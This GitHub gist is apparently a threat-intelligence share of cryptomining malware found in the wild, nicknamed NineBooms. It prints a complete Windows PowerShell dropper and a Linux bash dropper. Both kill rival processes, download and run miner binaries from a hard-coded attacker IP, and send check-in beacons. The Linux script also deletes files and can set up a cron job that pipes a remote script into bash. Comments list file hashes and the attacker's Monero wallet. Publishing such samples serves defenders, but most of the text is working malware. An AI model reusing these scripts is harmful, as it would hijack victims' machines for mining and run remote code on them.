Skip to content

Instantly share code, notes, and snippets.

@nma-io

nma-io/CryptoMiner Found in wild

Last active November 2, 2018 22:44
Show Gist options
  • Save nma-io/250fdff899e8d458b9ca43cfe715b5fc to your computer and use it in GitHub Desktop.
Save nma-io/250fdff899e8d458b9ca43cfe715b5fc to your computer and use it in GitHub Desktop.
Download ZIP
This was observed through our SOC via an unsuccessful JexBoss attack. We're calling it NineBooms
Raw
CryptoMiner Found in wild
$counters = (Get-Counter '\Process(*)\% Processor Time').CounterSamples
$malwares = "Kilence","alm","vag_pag","office","pws_lotinfo_trans","aspnet_state","tasksvr","ekrn","iems","secscan","mysql","trustedinstaller","safedogsiteiis","write","360cleanhelper","sw_magik_gss","wd160session","smsservice","360rps","win1nit","npinst","xmrig","mrservicehost","360rp","hrate","xmr","laozi","csrs","postgres","csrv","safedogguardcenter","sl_gps_msg","javaservice","lsass","taskngr","dc","aipcopywlh64","xqjxke","sl_gps_rule","svhosts","qqexternal","streamserver","qv","sapstartsrv","avgcsrva","360se","alarmservice","nscpucnminer64","thunderplatform","xmrig32","ntrtscan","arp","a8service","msiexev","rsturboball","sl_join_bb808","ramdial","sl_upload809_1","beasvcx64","ptzproxyservice","connect","runtimebroker","system64","win1ogin","sql31","vmware","systemiissec","werfault","w3wp","snmpd","conhosts","taskhots","icrawlers_fbs_cjd","systmss","calcserviced","wmiprvser","bcompare","helppanc","memcached","qqpctray","see64","sl_join_srv","svchsot","reportengine","lms","winlogo","360tray","sppscv","nmsclient","mysqld","stest","apache","waterfox","teamviewer","mssql","mscorswv","jp2launcher","service","launch","tktbqi","mssys","taskhost","coiacy","networkmanager","systemtask","runtime","msmpeng","7za","reportingservicesservice","firefox","zhudongfangyu","wudfhost","javaw","mscl","lsmosee","cs","secury","db2syscs","xmr86","httpd","esetonlinescanner_enu","java","magserver","ravmond","chrome","serviceshost","update_windows","chinelada","system","carboniteservice","perl","ctsrvr","voipswitch","qqprotect","taskmgr","scope","vrmserver","wmiprvse","centralclient","csres","mcshield","mgmt","seccopy","wininits","decodeprocess","dvsvct","csrss","dvsvcs","update64","regsvr32","sl_gps_gpsserver","servicewatchdog","mininews","dllhost","msiexec","ntvdm","ivms","oneclickservice","cidaemon","spoolvs","cloudhelper","desktoplayer","conhost","messageserver","vshell","vag_stream","logon","powershell","svchosts3","servisce","vtdu","stream","process","svchost","qqpcnetflow","tomcat7","tomcat6","spoolsv","spectroserver","sceserver","filesearcherindex","tomcat8","sqlservr","mapa","nlbrute","360sdupd","winlogon","ccsvchst","csc","safedogtray","appserver","hpbsm_wde","ksmsvc","tkinstaller","calcclientgyd","smss","ns","mscorsvw","xmrig1","winlogin","qqpcrealtimespeedup","explorer","mscorswu","convert_imagemagick","win1ogins","qqpcrtp","nmsserver","oracle","winlnlts","svchostx","cms_controlclient","services","inteldevicemanager","iexplore","lsmose","frmweb","pag","dcserver","ggtbviewer","winlogan","cpuminer","minergate","cascade","wmiapsrv","nvidia","softupnotify","sl_gps_adapter"
$malwares2 = "Silence","Carbon","xmrig32","nscpucnminer64","mrservicehost","servisce","svchosts3","svhosts","system64","systemiissec","taskhost","vrmserver","vshell","winlogan","winlogo","logon","win1nit","wininits","winlnlts","taskngr","tasksvr","mscl","cpuminer","sql31","taskhots","svchostx","xmr86","xmrig","xmr","win1ogin","win1ogins","ccsvchst","nscpucnminer64","update_windows"
foreach ($counter in $counters) {
if ($counter.CookedValue -ge 50) {
if ($counter.InstanceName -eq "idle" -Or $counter.InstanceName -eq "_total") {
continue
}
foreach ($malware in $malwares) {
if ($counter.InstanceName -eq $malware) {
Stop-Process -processname $counter.InstanceName -Force
}
}
}
foreach ($malware2 in $malwares2) {
if ($counter.InstanceName -eq $malware2) {
Stop-Process -processname $counter.InstanceName -Force
}
}
}
$SELF_COPY = "$HOME\win.txt"
$HSST = "http://200.7.97.205:8086"
$CALLBACK = $HSST
$DEFAULT_RFILE = "$HSST/64Kilences.exe"
$OTHERS_RFILE = "$HSST/32Kilences.exe"
$LFILE_PATH = "$env:TMP\Drive.exe"
$DOWNLOADER = New-Object System.Net.WebClient
$SYSTEM_BIT = [System.IntPtr]::Size
if ( $SYSTEM_BIT -eq 8 ) {
$DOWNLOADER.DownloadFile($DEFAULT_RFILE, $LFILE_PATH)
} else {
$DOWNLOADER.DownloadFile($OTHERS_RFILE, $LFILE_PATH)
}
if ( !(Get-Process systemgo -ErrorAction SilentlyContinue) ) {
$DOWNLOADER.DownloadString("$CALLBACK/?info=w0")
cmd.exe /c $LFILE_PATH
} else {
$DOWNLOADER.DownloadString("$CALLBACK/?info=w9")
}
@nma-io
Copy link
Author

nma-io commented Feb 23, 2018

MD5 (32Kilences.exe) = 5f980357049bec59acf4fa3f64ad076f
MD5 (64Kilences.exe) = 41f120f918d226275471e00f1fd7bd2f
MD5 (win.txt) = e7f9375443cd29f771875c185062c6ba

@nma-io
Copy link
Author

nma-io commented Feb 23, 2018
edited
Loading

Linux Version was found on the same malicious site:

MD5 (BoomBoom) = f75a3ee5fba082e6ccc38373cff39176
MD5 (BoomBoom2) = 2e49d437c95119becb881a3a269832d6
MD5 (lin.txt) = 0d3784ddb430cdeb2f0641a68b7715e4

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

HOST=200.7.97.205:8086
CALLBACK=$HOST

DOWNLOADER="curl "
#DOWNLOADER="wget -q -O - "

LFILE_NAME="BoomBoom"
# LFILE_PATH=`pwd`/$LFILE_NAME
LFILE_PATH=/tmp/$LFILE_NAME

DEFAULT_RFILE=$HOST/BoomBoom
OTHERS_RFILE=$HOST/BoomBoom2

CLEAN ()
{

  KILIST=(crobon sb1 wipefs AnXqV.yam [email protected] monerohash.com /tmp/a7b104c270 stratum.f2pool.com:8888 42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQt989KEfGRt6Ww2Xg8 46SDR76rJ2J6MtmP3ZZKi9cEA5RQCrYgag7La3CxEootQeAQULPE2CHJQ4MRZ5wZ1T73Kw6Kx4Lai2dFLAacjerbPzb5Ufg 42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe xmrpool.eu mine.moneropool.com xmr.crypto-pool.fr:8080 xmr.crypto-pool.fr:3333 xmr.crypto-pool.fr:6666 xmr.crypto-pool.fr:7777 xmr.crypto-pool.fr:443)
  for item in ${RMLIST[@]}
  do
      rm -rf $item
  done
  for item in ${KILIST[@]}
  do
      ps auxf|grep -v grep|grep $item|awk '{print $2}'|xargs kill -9
  done
  days=$(($(date +%s) / 60 / 60 / 24))
  ps auxf|grep -v grep|grep "42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe"|awk '{print $2}'|xargs kill -9
  ps auxf|grep -v grep|grep "45cToD1FzkjAxHRBhYKKLg5utMGENqyamWrY8nLNkVQ4hJgLHex1KNRZcz4finRjMpAYmPxDaXVpN2rV1jMNyXRdMEaH1YA"|awk '{print $2}'|xargs kill -9
  ps auxf|grep -v grep|grep ${days}|awk '{print $2}'|xargs kill -9
  ps auxf|grep -v grep|grep "logind.conf"|awk '{print $2}'|xargs kill -9
  ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
  ps auxf|grep -v grep|grep "kworker"|awk '{print $2}'|xargs kill -9
  ps auxf|grep -v grep|grep "Silence"|awk '{print $2}'|xargs kill -9
  ps auxf|grep -v grep|grep "45hsTaSqTQM4K1Xeqkcy7eLzqdEuQ594fJVmQryCemQSCU878JGQdSDCxbhNyVjSkiaYat8yAfBuRTPSEUPZoARm9a5XEHZ"|awk '{print $2}'|xargs kill -9
  ps auxf|grep -v grep|grep "47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB"|awk '{print $2}'|xargs kill -9
  ps auxf|grep -v grep|grep "44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM"|awk '{print $2}'|xargs kill -9
  ps auxf|grep -v grep|grep "xmr.crypto-pool.fr"|awk '{print $2}'|xargs kill -9
  ps auxf|grep -v grep|grep "t.sh"|awk '{print $2}'|xargs kill -9
  ps auxf|grep -v grep|grep "wipefs"|awk '{print $2}'|xargs kill -9
  ps auxf|grep -v grep|grep "carbon"|awk '{print $2}'|xargs kill -9
  pkill -f 49hNrEaSKAx5FD8PE49Wa3DqCRp2ELYg8dSuqsiyLdzSehFfyvk4gDfSjTrPtGapqcfPVvMtAirgDJYMvbRJipaeTbzPQu4
  pkill -f 4AniF816tMCNedhQ4J3ccJayyL5ZvgnqQ4X9bK7qv4ZG3QmUfB9tkHk7HyEhh5HW6hCMSw5vtMkj6jSYcuhQTAR1Sbo15gB
  pkill -f 4813za7ePRV5TBce3NrSrugPPJTMFJmEMR9qiWn2Sx49JiZE14AmgRDXtvM1VFhqwG99Kcs9TfgzejAzT9Spm5ga5dkh8df
  pkill -f cpuloadtest
  pkill -f crypto-pool
  pkill -f xmr
  pkill -f prohash
  pkill -f monero
  pkill -f miner
  pkill -f nanopool
  pkill -f minergate
  pkill -f yam
  pkill -f Silence
  pkill -f yam2
  pkill -f minerd
  pkill -f Circle_MI.png
  pkill -f curl
  ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
  ps auxf|grep -v grep|grep "crypto-pool"|awk '{print $2}'|xargs kill -9
  ps auxf|grep -v grep|grep "prohash"|awk '{print $2}'|xargs kill -9
  ps auxf|grep -v grep|grep "monero"|awk '{print $2}'|xargs kill -9
  ps auxf|grep -v grep|grep "miner"|awk '{print $2}'|xargs kill -9
  ps auxf|grep -v grep|grep "nanopool"|awk '{print $2}'|xargs kill -9
  ps auxf|grep -v grep|grep "minergate"|awk '{print $2}'|xargs kill -9
  ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
  ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
  ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
  ps auxf|grep -v grep|grep "[email protected]"|awk '{print $2}'|xargs kill -9
  ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
  ps auxf|grep -v grep|grep "44pgg5mYVH6Gnc7gKfWGPR2CxfQLhwdrCPJGzLonwrSt5CKSeEy6izyjEnRn114HTU7AWFTp1SMZ6eqQfvrdeGWzUdrADDu"|awk '{print $2}'|xargs kill -9
  ps auxf|grep -v grep|grep "42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe"|awk '{print $2}'|xargs kill -9
  ps auxf|grep -v grep|grep "49JsSwt7MsH5m8DPRHXFSEit9ZTWZCbWwS7QSMUTcVuCgwAU24gni1ydnHdrT9QMibLtZ3spC7PjmEyUSypnmtAG7pyys7F"|awk '{print $2}'|xargs kill -9
  ps auxf|grep -v grep|grep "479MD1Emw69idbVNKPtigbej7x1ZwFR1G3boyXUFfAB89uk2AztaMdWVd6NzCTfZVpDReKEAsVVBwYpTG8fsRK3X17jcDKm"|awk '{print $2}'|xargs kill -9
  ps auxf|grep -v grep|grep "11231"|awk '{print $2}'|xargs kill -9
  pkill -f biosetjenkins
  ps ax|grep var|grep lib|grep jenkins|grep -v httpPort|grep -v headless|grep "\-c"|xargs kill -9
  ps ax|grep -o './[0-9]* -c'| xargs pkill -f
  pkill -f Loopback
  pkill -f apaceha
  pkill -f cryptonight
  ps ax|grep tmp|grep irqa|grep -v grep|awk '{print $1}'|xargs ps --ppid|awk '{print $1}'|grep -v PID|xargs kill -9
  ps ax|grep tmp|grep irqa|grep -v grep|awk '{print $1}'|xargs kill -9
  pkill -f 45.76.102.45
  pkill -f stratum
  pkill -f mixnerdx
  pkill -f performedl
  pkill -f sleep
  pkill -f JnKihGjn
  pkill -f irqba2anc1
  pkill -f irqba5xnc1
  pkill -f irqbnc1
  pkill -f ir29xc1
  pkill -f conns
  pkill -f irqbalance
  pkill -f crypto-pool
  pkill -f minexmr
  pkill -f XJnRj
  pkill -f NXLAi
  pkill -f BI5zj
  pkill -f askdljlqw
  pkill -f minerd
  pkill -f minergate
  pkill -f Guard.sh
  pkill -f ysaydh
  pkill -f bonns
  pkill -f donns
  pkill -f kxjd
  pkill -f 108.61.186.224
  pkill -f Duck.sh
  pkill -f bonn.sh
  pkill -f conn.sh
  pkill -f kworker34
  pkill -f kw.sh
  pkill -f pro.sh
  pkill -f polkitd
  pkill -f acpid
  pkill -f icb5o
  pkill -f nopxi
  ps -ef|grep '.so'|grep -v grep|cut -c 9-15|xargs kill -9;
  pkill -f 45.76.146.166
  pkill -f irqbalanc1
  pkill -f 188.120.247.175
  rm -rf /tmp/httpd.conf
  rm -rf /tmp/conn
  rm -rf /tmp/conns
  rm -f /tmp/irq.sh
  rm -f /tmp/irqbalanc1
  rm -f /tmp/irq
}

DEFAULT ()
{
  $DOWNLOADER $DEFAULT_RFILE > $LFILE_PATH
  chmod +x $LFILE_PATH
  ps -ef|grep $LFILE_NAME|grep -v grep
  if [ $? -ne 0 ]; then
    $LFILE_PATH -B && $DOWNLOADER "${CALLBACK}/?info=l60"
  else
    $DOWNLOADER "${CALLBACK}/?info=l69"
  fi
}

OTHERS ()
{
  $DOWNLOADER $OTHERS_RFILE > $LFILE_PATH
  chmod +x $LFILE_PATH
  ps -ef|grep $LFILE_NAME|grep -v grep
  if [ $? -ne 0 ]; then
    $LFILE_PATH -B && $DOWNLOADER "${CALLBACK}/?info=l30"
  else
    $DOWNLOADER "${CALLBACK}/?info=l39"
  fi
}

CRON () {
  if [ -x /usr/bin/wget ] ; then
        echo '*/8 * * * * wget -q -O - $HOST/lin.txt |bash' > /tmp/.$LFILE_NAME.cron
    elif [ -x /usr/bin/curl ] ; then
        echo '*/8 * * * * curl $HOST/lin.txt |bash' > /tmp/.$LFILE_NAME.cron
    else
        exit 0;
    fi
    crontab -r
    crontab /tmp/.$LFILE_NAME.cron
    rm /tmp/.$LFILE_NAME.cron
}

INIT () {
	echo 128 > /proc/sys/vm/nr_hugepages
	sysctl -w vm.nr_hugepages=128
}



KILL () {
  ps aux |grep -v sourplum | awk '{if($3>20.0) print $2}' | while read procid
  do
    kill -9 $procid
  done
}

CLEAN
INIT
if [ $(getconf WORD_BIT) = '32' ] && [ $(getconf LONG_BIT) = '64' ] ; then
    DEFAULT
else
    OTHERS
fi
# CRON
crontab -r

@nma-io
Copy link
Author

nma-io commented Feb 24, 2018

Monero Wallet is: 45cToD1FzkjAxHRBhYKKLg5utMGENqyamWrY8nLNkVQ4hJgLHex1KNRZcz4finRjMpAYmPxDaXVpN2rV1jMNyXRdMEaH1YA and is searchable on MineXMR.com - Appears to have generated around $3200 at the current exchange rate.

@Ninjtrovert
Copy link

Awesome find, thank you for the contribution!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment